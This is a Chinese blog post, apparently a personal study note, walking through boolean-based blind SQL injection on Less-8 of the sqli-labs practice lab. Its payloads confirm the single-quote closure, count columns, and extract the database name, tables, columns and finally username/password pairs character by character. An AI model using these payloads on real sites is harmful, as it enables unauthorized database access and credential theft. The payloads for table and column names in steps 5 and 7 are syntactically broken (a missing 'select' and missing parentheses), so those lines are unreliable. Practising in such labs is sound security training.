学习记录之sqli-labs less8

已于 2023-02-16 23:44:02 修改
阅读量89 收藏 1
点赞数
分类专栏: sqli-labs 文章标签: 学习 sql
于 2023-02-16 23:33:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x_13579/article/details/129074727
版权

less-8:

布尔型盲注:

特点:页面存在异常,页面无回显也无报错信息,这是布尔型盲注的特点。

利用:只能通过正确与错误两种状态来判断payload是否正确。

布尔盲注的思想:

利用判断语句来证明推测是否正确

推测正确时,页面正常显示;错误时,页面异常。

刚打开的页面是这样的:

(1)求闭合字符

我们输入?id=1

测试单引号,是这样的界面

双引号是这样的页面

单引号+)

双引号+)

进行逻辑判断

?id=1’ and 1=1 %23

?id=1’ and 1=2 %23

页面不同,说明被当作语句执行了

也说明,闭合字符是单引号

判断列数:

?id=1’ order by * %23

 3页面正常,4页面错误,说明有三列

判断显示位:

?id=1’ and 1=2 union select 1,2,3 %23

 这时,并不会和以前一样有什么显示,还是显示正常的页面,没有得到我们想要的显示位。

(2)求数据库名的长度:

?id=1’ and length(database())=1 %23

=2

...

一直试到8,出现了正确页面,说明数据库名的长度为8

用等号的方式去测的话需要一个一个的去试,可以选择用大于号或者是小于号,采用二分法的形式去测,这样比一个一个要快一些。

(3)求当前数据库名对应的ASCII值

?id=1’ and ascii(substr(database(),1,1))=115 %23

 这个也是试对的时候才会出现正确的页面,结合ascii码表。

上面我们知道了数据库名的长度为8,所以要测第一个字符,第二个...第八个

纯手工试的话,速度慢,工作量大。

(4)求表的数量

?id=1’ and (select count(table_name) from information_schema.tables where table_schema=’security’)=1 %23

 直到试到4是正确的

 说明有四个表

(5)求表名对应的ASCII值

?id=1’ and ascii(substr( table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1)<102 %23

 (6)求列的数量

?id=1’ and (select count(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’)<4 %23

(7)求列名对应的ASCII值

?id=1’ and ascii(substr(select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),1,1)<105 %23

(8)求字段的数量

?id=1’ and (select count(username) from security.users)<14 %23

(9)求字段内容对应的ASCII值

?id=1’ and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))<68 %23

x_13579
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
从零记录sqli-labs学习过程 sqli-labs Less-3
fpxnb1的博客
03-24 2106
sqli-labs Less-3
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
SQLi-LABS】Less-8、Less9 Blind- Boolean/Time based- Single Quotes- String解题记录
自知.的博客
09-23 246
sqli-labs的less8和less9题题解,分别使用布尔盲注和时间盲注进行解决,使用了burpsuit进行时间盲注,步骤及其详尽,具有学习、参考意义。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs Less8
orchid_sea的博客
10-16 1016
1.判断注入点 2.判断字段数 3.爆破数据库 4.爆破表 5.爆破列 6.爆破数据
网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where
m0_54903333的博客
05-09 291
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs实验指导手册
11-17
sqli-labs是一个专门设计的实验平台,用于教育和实践SQL注入技术。以下是对sqli-labs实验指导手册中涉及的SQL注入知识点的详细说明: 1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache 环境中部署 sqli...sqli-labs 是一个非常有用的工具,帮助用户学习和实践 SQL 注入的技术。通过部署 sqli-labs,用户可以在 PHP 和 Apache 环境中实践 SQL 注入的技术,从而提高自己的安全意识和防御能力。
昇思25天学习打卡营第十天|ShuffleNet图像分类
子殊的博客
06-29 1033
ShuffleNetV1是旷视科技提出的一种计算高效的CNN模型,和MobileNet, SqueezeNet等一样主要应用在移动端,所以模型的设计目标就是利用有限的计算资源来达到最好的模型精度。ShuffleNetV1的设计核心是引入了两种操作:Pointwise Group Convolution和Channel Shuffle,这在保持精度的同时大大降低了模型的计算量。因此,ShuffleNetV1和MobileNet类似,都是通过设计更高效的网络结构来实现模型的压缩和加速。
昇思25天学习打卡营第2天|张量学习
main_h_的博客
06-26 864
张量是一种特殊的数据结构,主要是描述矩阵 行列式这类。张量(Tensor)是MindSpore网络运算中的基本数据结构,类似日常的多维数组,不过比基础的数组多了一些描述信息。
Java程序员学习Go开发Higress的WASM插件
BothSavage
06-26 846
tinygo@0.32+go@1.19无法在macos arm架构下打包。升级go@1.21再次打包提示unsafe.SliceData requires go1.20 or later。后放弃macos+arm,采用ubuntu+amd64打包,ubuntu打包也必须使用tinygo@0.28.1。0.32.0在ubuntu仍然提示unsupported GOOS/GOARCH pair wasip1/wasm。
昇思25天学习打卡营第10天 | 基于MindNLP+MusicGen生成自己的个性化音乐
cftang9999的专栏
06-28 562
MusicGen是来自Meta AI的Jade Copet等人提出的基于单个语言模型(LM)的音乐生成模型,能够根据文本描述或音频提示生成高质量的音乐样本,相关研究成果参考论文《MusicGen直接使用谷歌的及其权重作为文本编码器模型,并使用及其权重作为音频压缩模型。MusicGen解码器是一个语言模型架构,针对音乐生成任务从零开始进行训练。MusicGen 模型的新颖之处在于音频代码的预测方式。
昇思MindSpore学习笔记2-01 LLM原理和实践 --基于 MindSpore 实现 BERT 对话情绪识别
最新发布
muren的专栏
07-02 544
通过识别BERT对话情绪状态的实例,展现在昇思MindSpore AI框架中大语言模型的原理和实际使用方法、步骤。
论文学习——一种自适应提升的动态多目标优化进化算法
choudongxi的博客
06-29 980
很新奇的静态优化方法选择策略,在第一次静态优化时,分3个种群试验他的性能来选择合适的静态优化器,具体效果可能还是需要写出来再看看.环境变化以后如果非支配占总体少于70%就采用移动支配解向非支配解靠近并进行交叉变异正常环境响应就是随机把种群分成3分分别采用1.中心点预测(+一点高斯扰动)和2.使用记忆方法判断环境的相似程度以后采用预测方法3.使用遗传算子、多项式突变和高斯突变来保证种群的多样性.再根据静态优化时个体移动的距离来更新3个方法的使用的权重.很牛逼的创新点,因为方法都不难,为什么我脑袋空空.
Gradle学习-3 Gradle插件
weixin_41733225的博客
06-27 395
主要介绍Gradle插件,其中包含二进制插件、脚本插件
Batch入门学习
嫦娥妹妹等等我的博客
06-27 284
以上内容为Batch脚本入门学习的基础知识,通过不断实践和探索,你可以熟练掌握并应用Batch脚本来自动化各种任务。- `@echo off`:关闭命令行回显,使脚本运行时不显示执行的命令。- 在脚本的不同部分使用`pause`命令暂停,以观察脚本的执行进程。Batch脚本的文件扩展名通常是`.bat`或`.cmd`。- `pause`:暂停脚本执行,等待用户按键。- `echo`:在命令行中输出文本。- `mkdir`:创建目录。- `rmdir`:删除目录。- `copy`:复制文件。
JavaScript高级程序设计(第四版)--学习记录之集合引用类型(下)
Zwq8023520的博客
06-26 231
Map Map的基本API WeakMap WeakMap的基本API
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值